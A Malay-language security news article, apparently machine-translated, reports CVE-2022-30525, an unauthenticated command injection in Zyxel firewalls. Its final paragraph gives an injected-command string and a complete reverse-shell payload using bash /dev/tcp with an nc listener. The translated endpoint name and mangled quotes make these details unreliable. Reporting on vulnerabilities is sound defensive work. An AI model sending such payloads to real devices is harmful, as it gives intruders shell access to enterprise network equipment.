Kerentanan dalam tembok api Zyxel yang membenarkan pelaksanaan kod tanpa pengesahan

Kerentanan kritikal (CVE-2022-30525) telah dikenal pasti dalam peranti Zyxel siri ATP, VPN dan USG FLEX, yang direka bentuk untuk mengatur pengendalian tembok api, IDS dan VPN dalam perusahaan, yang membolehkan penyerang luar melaksanakan kod pada peranti tanpa hak pengguna tanpa pengesahan. Untuk melakukan serangan, penyerang mesti boleh menghantar permintaan kepada peranti menggunakan protokol HTTP/HTTPS. Zyxel telah membetulkan kelemahan dalam kemas kini perisian tegar ZLD 5.30. Menurut perkhidmatan Shodan, pada masa ini terdapat 16213 peranti yang berpotensi terdedah pada rangkaian global yang menerima permintaan melalui HTTP/HTTPS.

Operasi dijalankan dengan menghantar arahan yang direka khas kepada pengendali web /ztp/cgi-bin/pengendali, boleh diakses tanpa pengesahan. Masalahnya disebabkan oleh kekurangan pembersihan parameter permintaan yang betul apabila melaksanakan arahan pada sistem menggunakan panggilan os.system yang digunakan dalam perpustakaan lib_wan_settings.py dan dilaksanakan semasa memproses operasi setWanPortSt.

Sebagai contoh, penyerang boleh melepasi rentetan β€œ; ping 192.168.1.210;" yang akan membawa kepada pelaksanaan perintah "ping 192.168.1.210" pada sistem. Untuk mendapatkan akses kepada shell arahan, anda boleh menjalankan "nc -lvnp 1270" pada sistem anda, dan kemudian memulakan sambungan terbalik dengan menghantar permintaan kepada peranti dengan '; bash -c \Β»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\Β»;'.

Sumber: opennet.ru

Tambah komen